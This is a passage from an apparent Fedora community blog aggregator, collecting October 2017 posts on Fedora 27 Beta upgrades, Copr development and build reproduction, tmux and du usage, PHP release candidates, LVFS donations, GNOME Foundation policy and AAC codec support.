Planned update of Firefox browser to version 57 seems to has provoked interesting discussions on devel@ mailing list (“Why is Fx 57 in Updates Testing?“, “Call for testing – Firefox 57“) and was even broad to FESCo. Reading the whole discussion reminds me how difficult is to balance on the edge of the latest updates and stability.

And of course, the list above is not exhaustive and there is much more going on in Fedora community. The list above just summarizing some tasks which has drawn my attention.

 

The post What I have found interesting in Fedora during the week 41 of 2017 appeared first on Fedora Community Blog.

Episode 66 - Objects in mirror are less terrible than they appear

Posted by Open Source Security Podcast on October 16, 2017 03:59 PM
Josh and Kurt talk about Equifax again, Kaspersky, TLS CAs, coming change, social security numbers, and Minecraft.


<iframe allowfullscreen="" height="90" mozallowfullscreen="" msallowfullscreen="" oallowfullscreen="" scrolling="no" src="http://html5-player.libsyn.com/embed/episode/id/5840636/height/90/width/640/theme/custom/autonext/no/thumbnail/yes/autoplay/no/preload/no/no_addthis/no/direction/backward/render-playlist/no/custom-color/6e6a6a/" style="border: none;" webkitallowfullscreen="" width="640"></iframe>

Show Notes



Shaking the tin for LVFS: Asking for donations!

Posted by Richard Hughes on October 16, 2017 03:50 PM

tl;dr: If you feel like you want to donate to the LVFS, you can now do so here.

Nearly 100 million files are downloaded from the LVFS every month, the majority being metadata to know what updates are available. Although each metadata file is very small it still adds up to over 1TB in transfered bytes per month. Amazon has kindly given the LVFS a 2000 USD per year open source grant which more than covers the hosting costs and any test EC2 instances. I really appreciate the donation from Amazon as it allows us to continue to grow, both with the number of Linux clients connecting every hour, and with the number of firmware files hosted. Before the grant sometimes Red Hat would pay the bandwidth bill, and other times it was just paid out my own pocket, so the grant does mean a lot to me. Amazon seemed very friendly towards this kind of open source shared infrastructure, so kudos to them for that.

At the moment the secure part of the LVFS is hosted in a dedicated Scaleway instance, so any additional donations would be spent on paying this small bill and perhaps more importantly buying some (2nd hand?) hardware to include as part of our release-time QA checks.

I already test fwupd with about a dozen pieces of hardware, but I’d feel a lot more comfortable testing different classes of device with updates on the LVFS.

One thing I’ve found that also works well is taking a chance and buying a popular device we know is upgradable and adding support for the specific quirks it has to fwupd. This is an easy way to get karma from a previously Linux-unfriendly vendor before we start discussing uploading firmware updates to the LVFS. Hardware on my wanting-to-buy list includes a wireless network card, a fingerprint scanner and SSDs from a couple of different vendors.

If you’d like to donate towards hardware, please donate via LiberaPay or ask me for PayPal/BACS details. Even if you donate €0.01 per week it would make a difference. Thanks!

Upgrade Fedora Workstation to Fedora 27 Beta

Posted by Fedora Magazine on October 16, 2017 08:00 AM

In case you missed the news, Fedora 27 Beta was released last week. If you’re running Fedora Workstation, it’s easy to upgrade to the Beta release. Then you can try out some of the new features early. This article explains how.

Some helpful advice

The Fedora 27 Beta is still just what it says it is: a beta. That means some features are still being tuned up before the final release. However, it works well for many users, especially those who are technically skilled. You might be one of them. Before you upgrade, here are some things to keep in mind.

First, back up your user data. While there are no problems currently known that would risk your data, it’s a good idea to have a recent backup for safety.

Second, remember this process downloads all the update data over your internet connection. It will take some time, based on your connection speed. Upgrading the system also requires a reboot, and takes some time to install the updated packages. Don’t perform this operation unless you have time to wait for it to finish.

If you move to the Beta, you’ll receive updates for testing during the prerelease period. When the Beta goes to Final, you’ll receive an update to the fedora-release package. This will shut off the updates-testing stream. Your system will then automatically follow the Fedora 27 stable release. You don’t need to do anything to make this happen.

Upgrading your system

Open a Terminal and type the following command:

gsettings set org.gnome.software show-upgrade-prerelease true

This setting lets the Software application detect the availability of a prerelease, in this case Fedora 27 Beta.

Normally you have to wait for the Software service to refresh its information. However, you can force it to do this in several ways. One is to kill the service and restart it manually:

pkill gnome-software

Now open the Software app. Visit the Updates tab. After a short time, the Software app retrieves fresh information about the prerelease and advertises it to you.

Use the Download Now button to download the upgrade data for Fedora 27 Beta. Follow the prompts to reboot and install the upgrade, which will take some time. When your system restarts after the upgrade, you’ll be running the Fedora 27 Beta.

Copr - Vagrant development

Posted by Jakub Kadlčík on October 16, 2017 12:00 AM

[OUTDATED] This article explains my local setup and personal workflow for developing Copr. This doesn’t necessarily mean that it is the best way how to do it, but it is the way that suits best to my personal preferences. Other team members probably approach this differently.

Theory

Developing in vagrant has a lot of advantages, but it also brings us few unpleasant things. You can basically set up your whole environment just by running vagrant up which allows you to test your code on a production-like machine. This is absolutely awesome. The bad thing (while developing) is that on such machine you can’t do things like “I am gonna change this line and see what happens” or interactive debugging via ipdb.

Actually what you have to do is committing the change first, building a package from your commit, installing it and then restarting your server. Or if you are lazy, committing the change and reloading the whole virtual machine. However it doesn’t matter, it will be slow and painful either way. In this article I am going to explain how you can benefit from Vagrant features but still develop comfortably and “interactively”.

Prerequisites

# You should definitely not turn off your firewall
# I am lazy to configure it though
$ sudo systemctl stop firewalld
$ sudo dnf install vagrant

Example workflow

Let’s imagine that we want to make some change in frontend code. First of all, we have to setup and start our dev environment. The following command will run virtual machines for frontend and distgit.

$ vagrant up

Then we will connect to the machine, that we want to modify - in this case, frontend.

$ vagrant ssh frontend

Now, as it is described in frontend section, we will stop production server and run development one from /vagrant folder which is synchronized with our host machine. It means, that every change from your IDE is immediately projected to your web server. For instance, try to put import ipdb; ipdb.set_trace() somewhere to the code and reload copr-frontend in the browser. You can see the debugger in your terminal.

ipdb>

Similarly, you can use such workflow for distgit.

Frontend

# [frontend]
sudo systemctl stop httpd
sudo python /vagrant/frontend/coprs_frontend/manage.py runserver -p 80 -h 0.0.0.0

Dist-git

# [dist-git]
sudo systemctl stop copr-dist-git
sudo su copr-service
cd
PYTHONPATH=/vagrant/dist-git /vagrant/dist-git/run/importer_runner.py

Backend

There is no vagrant support for the backend. We rather use docker image for it. Let’s leave this topic for another post.

Follow up

I’ve been using this setup for over a year now and it served me quite well. Right until I wanted to run several machines at once, IDE and browser on a laptop with limited RAM capacity. That is one of the reasons why I decided to dockerize the whole Copr stack and move away from Vagrant. See my current workflow in a newer post - The whole Copr stack dockerized!

FAF URL setup of ABRT client Ansible role

Posted by ABRT team on October 15, 2017 09:31 AM

We recently added a new option to ABRT client Ansible role to setup URL of the FAF server, i.e., where crash reports from ABRT client are reported.

This small improvement will mostly appreciate people using or willing to use their installation of FAF for gathering crash reports from ABRT client for custom analysis, having their FAF installation running on custom server (easy to do using FAF ansible role) or in docker container.

Usage

To use ABRT client Ansible role it is needed to declare it in your playbook, as:

   ...
   roles:
     - ansible-abrt-client-role
   ...

By default, FAF URL is set to https://retrace.fedoraproject.org/faf, which is main FAF installation of Fedora. To adjust it, just put to your playbook:

   ...
   roles:
     - { role: ansible-abrt-client-role, faf_url: 'your.faf.url' }
   ...

Or, using the newer syntax:

   ...
   tasks:
   - include_role:
       name: ansible-abrt-client-role
     vars:
       faf_url: 'your.faf.url'
   ...

tmux config

Posted by Paul Mellors [MooDoo] on October 15, 2017 09:02 AM

I’ve just started playing with tmux in the i3 window manager, just to try something new.  For my benefit incase i need to reinstall, this is what I have in it so far. It’s nowhere complete, and just a start, but it works for me 🙂

Feel free to comment with additions or what you use in yours.

#change binding key
unbind-key C-b
set-option -g prefix C-a

bind-key C-a send prefix

bind-key v split-window -v
bond-key h split-window -h

set -g mouse on

bind -n M-Left select-pane -L
bind -n M-Right select-pane -R
bind -n M-Up select-pane -U
bind -n M-Down select-pan -D

set -g status off
 

 


Reproducible Copr builds

Posted by Jakub Kadlčík on October 14, 2017 12:00 AM

Well, sort of. Has your package failed to build in Copr? We introduce a new tool called copr-rpmbuild which allows you to reproduce it locally and make the debugging process much easier.

Behold copr-rpmbuild

copr-rpmbuild is a simple tool for reproducing Copr builds. Upon your needs, it can produce SRPM or RPM package. The best thing is that we use this tool internally within Copr infrastructure, so you can be sure that it reproduces the build under exactly same conditions.

The basic usage is straightforward

copr-rpmbuild --build-id <id> --chroot <name>

This will obtain a task definition from Copr and attempt to build RPM package into /var/lib/copr-rpmbuild/results/ directory. Except the binary package itself, there are also generated mock configs and logs.

If you are interested only in SRPM package, use

copr-rpmbuild --srpm --build-id <id>

Disclaimer

Did I get you on the buzzword reproducible builds? Well, let me clarify what does it mean in this context. Copr stores a definition of every build. We call such definition a build task, and it contains information needed to create the desired buildroot and produce a package in it. For instance, there is a name of mock chroot that should be used, what repositories should be allowed there, what packages should be installed, … and of course information about what is going to be built in it.

The meaning of reproducing a build is creating a local build from the same task as the original one. It is not guaranteed that the output will always be a 100% same. It may vary when using a different mock version or non-standard configuration on a client side and in situations when the package operates with build timestamp of itself.

Configuration

When no other config is specified, the pre-installed /etc/copr-rpmbuild/main.ini is used. This is also a configuration file used in Copr stack. You can specify a different config file by --config <path> parameter. Such config doesn’t necessarily have to contain all the possible options, just the ones that you want to change. Let me suggest two alternative configurations

User-friendly paths

Do not touch system directories.

[main]
resultdir = ~/copr-rpmbuild/results
lockfile = ~/copr-rpmbuild/lockfile
logfile = ~/copr-rpmbuild/main.log
pidfile = ~/copr-rpmbuild/pid

Different Copr instance

Use Copr staging instance as an example.

[main]
frontend_url = http://copr-fe-dev.cloud.fedoraproject.org
distgit_lookaside_url = http://copr-dist-git-dev.fedorainfracloud.org/repo/pkgs
distgit_clone_url = http://copr-dist-git-dev.fedorainfracloud.org/git

Examples

# Default usage
copr-rpmbuild --build-id 123456 --chroot fedora-27-x86_64

# Build only SRPM package
copr-rpmbuild --srpm --build-id 123456

# Use different config
copr-rpmbuild -c ~/my-copr-rpmbuild.ini --build-id 123456 --chroot fedora-27-x86_64

Policy hacking

Posted by Allan Day on October 13, 2017 02:48 PM

Last week I attended the first ever GNOME Foundation hackfest in Berlin, Germany. The hackfest was part of an effort to redefine how the GNOME Foundation operates and is perceived. There are a number of aspects to this process:

  1. Giving the Board of Directors a higher-level strategic oversight role.
  2. Empowering our staff to take more executive action.
  3. Decentralising the Foundation, so that authority and power is pushed out to the community.
  4. Engaging in strategic initiatives that benefit the GNOME project.

Until now, the board has largely operated in an executive mode: each meeting we decide on funding requests, trademark questions and whatever other miscellaneous issues come our way. While some of this decision-making responsibility is to be expected, it is also fair to say that the board spends too much time on small questions and not enough on bigger ones.

One of the reasons for last week’s hackfest was to try and shift the board from its executive role to a more legislative one. To do this, we wrote and approved spending policies, so that expenditure decisions don’t have to be made on a case-by-case basis. We also approved a budget for the financial year and specified budget holders for some lines of expenditure.

With these in place the board is now in a position to relinquish control over trivial spending decisions and to take up a high-level budget oversight role. Going forward the board will have have its eye on the big budget picture and not on the detail. Smaller spending decisions will be pushed out to our staff, to individual budget holders from the community and to committees.

It is hoped that these changes will allow us to play a more strategic role in the future. This transition will probably take some time yet, and there are some other areas that still need to be addressed. However, with the Berlin hackfest we have made a major step forward.

Huge thanks to the good people at Kinvolk for providing the venue for the event, and to the GNOME Foundation for sponsoring me to attend.

PHP version 7.0.25RC1 and 7.1.11RC1

Posted by Remi Collet on October 13, 2017 08:20 AM

Release Candidate versions are available in remi-test repository for Fedora and Enterprise Linux (RHEL / CentOS) to allow more people to test them. They are available as Software Collections, for a parallel installation, perfect solution for such tests (for x86_64 only), and also as base packages.

RPM of PHP version 7.1.11RC1 are available as SCL in remi-test repository and as base packages in the remi-test repository for Fedora 26-27 or remi-php71-test repository for Fedora 24-25 and Enterprise Linux.

RPM of PHP version 7.0.24RC1 are available as SCL in remi-test repository and as base packages in the remi-test repository for Fedora 25 or remi-php70-test repository for Fedora 24 and Enterprise Linux.

PHP version 5.6 is now in security mode only, so no more RC will be released.

PHP version 7.2 is in development phase, version 7.2.0RC2 is also available.

emblem-notice-24.pngInstallation : read the Repository configuration and choose your version.

Parallel installation of version 7.0 as Software Collection:

yum --enablerepo=remi-test install php70

Parallel installation of version 7.1 as Software Collection:

yum --enablerepo=remi-test install php71

Update of system version 7.0:

yum --enablerepo=remi-php70,remi-php70-test update php\*

Update of system version 7.1:

yum --enablerepo=remi-php71,remi-php71-test update php\*

Notice: version 7.1.11RC1 is also available in Fedora 27 (updates-testing) and version 7.2.0RC4 in Fedora rawhide for QA.

emblem-notice-24.pngEL-7 packages are built using RHEL-7.4.

emblem-notice-24.pngRC version is usually the same as the final version (no change accepted after RC, exception for security fix).

Software Collections (php70, php71)

Base packages (php)

Check disk usage at the command line with du

Posted by Fedora Magazine on October 13, 2017 08:00 AM

End users and system administrators sometimes struggle to get exact disk usage numbers by folder (directory) or file. The du command can help. It stands for disk usage, and is one of the most useful commands to report disk usage. This utility ships in the coreutils package included by default in Fedora.

You can list the size of a file:

$ du anaconda-ks.cfg
4 anaconda-ks.cfg

The -h switch changes the output to use human readable numbers:

$ du -h anaconda-ks.cfg
4.0K anaconda-ks.cfg

In most cases, your goal is to find disk usage in and under a folder, or its contents. Keep in mind this command is subject to the file and folder permissions that apply to those contents. So if you’re working with system folders, you should probably use the sudo command to avoid running into permission errors.

This example prints a list of contents and their sizes under the root (/) folder:

sudo du -shxc /*

Here’s what the options represent:

  • -s = summarize
  • -h = human readable
  • -x = one file system — don’t look at directories not on the same partition. For example, on most systems this command will mainly ignore the contents of /dev, /proc, and /sys.
  • -c = grand total

You can also use the –exclude option to ignore a particular directory’s disk usage:

sudo du -shxc /* --exclude=proc

You can provide file extensions to exclude, like .iso, .txt, or *.pdf. You can also exclude entire folders and their contents:

sudo du -sh --exclude=*.iso

You can also limit the depth to walk the directory structure using –max-depth. You can print the total for a directory (or file, with –all) only if it is N or fewer levels below the command line argument. If you use –max-depth=0, you’ll get the same result as with the -s option.

sudo du /home/ -hc --max-depth=2

Permisos básicos en GNU/Linux con chmod

Posted by Fernando Espinoza on October 12, 2017 07:30 PM

 Estructura básica de permisos en archivos Hay 3 atributos básicos para archivos simples: lectura, escritura y ejecutar. >> Permiso de lectura (read) Si tienes permiso de lectura de un archivo, puedes ver su contenido. >> Permiso de escritura (write) Si tienes permiso de escritura de un archivo, puedes modificar el archivo. Puedes agregar, sobrescribir o... Seguir leyendo →


Fedora 27 bekommt Support für AAC

Posted by Fedora-Blog.de on October 12, 2017 05:59 PM

Wie Christian Schaller in seinem Blog schreibt, wird Fedora 27 (Workstation) AAC-Audiodateien ohne Pakete aus Fremd-Repositories abspielen können.

Dafür wird eine von Google modifizierte Version der AAC-Implementierung sowie die dazugehörigen GStreamer-Plugins in Fedora 27 integriert.

Näheres dazu, wann die Pakete verfügbar sein werden und wie sie heißen, hat er jedoch noch nicht mitgeteilt.

Taking Stock, Making Plans.

Posted by Susan Lauber on October 12, 2017 05:02 PM
My company has a couple of projects that are about to wrap up. In both cases the client has hired a full time employee to pick up the work. This is great for them and normal for my business but it does mean finding "the next big thing" around the holidays.

My company is small. Really small. OK, it is just me. So I have the flexibility to take my time finding the next big project. I still have smaller, recurring contracts to carry through.

Before I get into what kind of excitement I want from my next big thing, I am looking forward to taking a few weeks off and maybe getting to a few of the many "if only I had the time" projects that are on my list. At least spending *some* time on wish items in between searching for the next big thing.

I often wish I could be more diligent about writing  and presenting. Writing here and even contributing to opensource.com. Presenting at conferences which I have done in the past, but also at local meetups. The small groups are a lot more fun! I had a couple of conference proposals that did not make the cut recently but that I think are still valuable. One I even planned to write an article on and still just have not gotten it done. It is on the list.

As I have watched my Goddaughter grow up, I have meant to get more involved in sharing my knowledge with kids. I took her to a Kid's Day event before a Red Hat Summit one year and we had a blast. Since I first explored the CISSP certification I have had the interest to go through the Safe and Secure Online training so I can look for volunteer opportunities. I also think the Techgirlz program is awesome (I might be a bit biased since a fellow instructor went to work there) and they have a local chapter. It is on the list.

When I got started contributing to open source communities it was with the Fedora Project and specifically the Docs team. I have not been anywhere near as active with Fedora lately and I miss it. I still consider myself an active Ambassador with each class I teach but I have not really contributed through content or formal activities lately. I am actually looking for a new challenge though, rather than returning to an old stomping ground, and probably with a smaller project. I dabbled in an Apache Hadoop ecosystem project for a bit and I still follow that mailing list but I never really got into that community. Melding open source and security is ideal, though I have really enjoyed the past year where I jumped into automation with Ansible and containers with OpenShift. The search continues.

Then of course there is the true time off - something that never really happens when you own your own business - where I can get things done around the house. The builtin bookcase that is already planned, the office cleaned out with all the old equipment donated, the yard spruced up, some light reading, etc.  Also all on the list.

-SML

AAC support will be available in Fedora Workstation 27!

Posted by Christian F.K. Schaller on October 12, 2017 04:34 PM

So I am really happy to announce another major codec addition to Fedora Workstation 27 namely the addition of the codec called AAC. As you might have seen from Tom Callaways announcement this has just been cleared for inclusion in Fedora.

For those not well versed in the arcane lore of audio codecs AAC is the codec used for things like iTunes and is found in a lot of general media files online. AAC stands for Advanced Audio Coding and was created by the MPEG working group as the successor to mp3. Especially due to Apple embracing the format there is a lot of files out there using it and thus we wanted to support it in Fedora too.

What we will be shipping in Fedora is a modified version of the AAC implementation released by Google, which was originally written by Frauenhoffer. On top of that we will of course be providing GStreamer plugins to enable full support for playing and creating AAC files for GStreamer applications.

Be aware though that AAC is a bit of an umbrella term for a lot of different technologies and thus you might be able to come across files that claims to use AAC, but which we can not play back. The most likely reason for that would be that it requires a AAC profile we do not support. The version of AAC that we will be shipping has also be carefully created to fit within the requirements for software in Fedora, so if you are a packager be aware that unlike with for instance mp3, this change does not mean you can package and ship any AAC implementation you want to in Fedora.

I am expecting to have more major codec announcements soon, so stay tuned :)